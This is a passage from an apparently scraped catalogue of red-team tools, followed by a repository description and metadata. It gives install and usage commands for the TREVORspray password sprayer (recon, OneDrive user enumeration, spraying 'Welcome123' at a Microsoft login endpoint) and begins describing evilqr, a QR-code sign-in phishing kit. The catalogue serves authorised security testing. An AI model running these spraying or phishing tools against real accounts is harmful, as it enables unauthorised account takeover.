https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster\u002Fwiki*\n\n### [🔙](#tool-list)[TREVORspray](https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray)\n\nTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\n\n**Install:** \n\n```bash\n# pip needs the git+ prefix to install straight from a repository URL\npip install git+https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray\n```\n\n**Usage:** \n\n```bash\n# Recon\npython3 .\u002Ftrevorspray --recon evilcorp.com\n\n# Enumerate users via OneDrive\npython3 .\u002Ftrevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n# Spray against the discovered users\npython3 .\u002Ftrevorspray -u emails.txt -p 'Welcome123' --url https:\u002F\u002Flogin.windows.net\u002Fb43asdas-cdde-bse-ac05-2e37deadbeef\u002Foauth2\u002Ftoken\n```\n\nFor full usage instructions see [here](https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray?tab=readme-ov-file#how-to---o365).\n\n![TREVORspray](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F67c64f6d-527a-4b59-8dd9-b73bc68274f4)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fblacklanternsecurity\u002FTREVORspray*\n\n### [🔙](#tool-list)[evilqr](https:\u002F\u002Fgithub.com\u002Fkgretzky\u002Fevilqr)\n\nToolkit demonstrating another approach to a QRLJacking attack, allowing remote account takeover through sign-in QR code phishing.\n\nIt consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, whi","RedTeam-Tools is a GitHub repository providing tools and techniques for red team and penetration testing activities. The project collects more than 150 tools and resources covering areas from information gathering to vulnerability exploitation, and aims to help security researchers simulate attacker behaviour in order to assess the security of target systems. These tools include both specialised software designed specifically for red teaming and general-purpose tools that can be flexibly applied in red team scenarios. It is suitable for in-house enterprise security teams carrying out tasks such as regular security audits, vulnerability scanning and attack-and-defence exercises. Note that all materials are for educational and research purposes only.",2,"2026-06-11 03:44:05","high_star"]